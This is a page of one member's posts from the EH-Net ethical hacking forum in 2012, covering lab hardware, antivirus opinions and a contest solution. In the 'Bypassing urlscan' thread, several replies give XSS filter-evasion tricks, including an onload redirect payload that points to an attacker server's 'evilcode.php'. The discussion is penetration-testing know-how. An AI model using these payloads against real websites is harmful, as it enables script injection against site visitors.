|
EH-Net
|
|
May 22, 2013, 02:49:23 PM
|
 Show Posts
|
|
Pages: 1 [2] 3 4 ... 12
|
|
23
|
Ethical Hacking Discussions and Related Certifications / Hardware / Re: Hacking Course - Need Laptop
|
on: July 02, 2012, 04:12:49 PM
|
man if u a computer u dont need to buy laptop u can use virtual machine for BT5 R2 like me im using vmware to run it in my windows seven u can use virtualbox for free good luck
You can do the same with a laptop, and have the added bonus of it being portable. I would have to agree with chrisj. A 16GB laptop with vmware workstation and a technet subscription is priceless. And good for gaming too. I would just say you might want to get a 15' since the 17' gets a little heavy after a while. |
|
|
|
|
24
|
Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Bypassing urlscan
|
on: June 29, 2012, 07:46:00 AM
|
Well, I've never gone up against urlscan before but I just beat F5's ASM XSS filter for the first time, so maybe some of the same tricks will work. Some of the things I used were: 1. I ditched using <script> because I couldn't get it passed. Instead used<image>. Notice it's not <img>. The WAF would filter <img> tags but not <image> and Firefox would display <image> just fine. Try iframe, style, and object tags too. 2. Split up the attack between parameters if possible. Break it at key points where the WAF won't be able to understand what's going on. 3. If ()'s are being blocked, you can try redirecting to a server that you own and get your code to run from there. I couldn't load directly to the site that I was attacking and it was filtering most javascript actions, but I was able to use an image tag and slip a "location" in an onload like this: onload=location=" http://server/evilcode.php". 4. I also ran across spots where the letters "http" were filtered. Here you can usually drop the http: and just use //server/evilcode.php. I don't know if any of that will be any help at all, and may be completely irrelevant to urlscan, but those are some of the things I've learned with evasion and hopefully some of it carries over. Thanks for the feedback! I will give this a try today. I never tried the <image> trick against the web app filters. Hopefully good news. I cannot wait for OffSec AWAE to open up. Anyway, thanks again for the help. |
|
|
|
|
26
|
Ethical Hacking Discussions and Related Certifications / Web Applications / Bypassing urlscan
|
on: June 28, 2012, 01:19:46 PM
|
|
Hello All,
Has anyone had any success bypassing urlscan when attempting to input xss? I used the usual NULL %00 and URL encoding. I even found some papers that said I could try <SCR%IPT> for filter evasion and obfuscation if I was targeting .NET which did not work too well by the way. If you have a link or paper, I should give a read, I would greatly appreciate it.
|
|
|
|
|
27
|
EH-Net / Greetings / Re: Hey guys (again)
|
on: June 11, 2012, 07:42:55 AM
|
|
Congrats on graduating and getting the new job! Very inspiring. I wouldn't worry about being the 5th wheel. You will learn faster with all the veterans there to help. Congrats again!!
|
|
|
|
|
28
|
Resources / News from the Outside World / Re: Stuxnet, Duqu and Flame VS. AntiVirus
|
on: June 01, 2012, 01:52:43 PM
|
|
My boss would agree with you 100%. He says that they are all "snake oil salesmen" and they created most of the problems to get money. The thing I am noticing is that they are not catching them but still saying they can protect against it. But isn't it a necessary evil at this point even without the FUD/gov't FUD?
|
|
|
|
|
29
|
EH-Net / Special Events / Re: [Article]-RUaNinja? Hacking Contest Solution
|
on: June 01, 2012, 12:57:14 PM
|
|
That was a good read. Man, great work Hayabusa!! I know I would have been stuck for a while on the "4,3:_3,1:6,3_6.2:6,3:8,1:_3,3:3,2:2,1:1,3:_2,3:6,3:6,1:7,1:8,2:8,1:3,2:7,3:7,4:_4,3:_3,3:3,2:2,1:7,3:_8,1:4,2:3,2:_5,3:
2,1:2,3:5,2:_6,3:3,3:_8,1:4,2:3,2:6,1:" part.
|
|
|
|
|
Loading...
|
Greetings : Hi from the UK
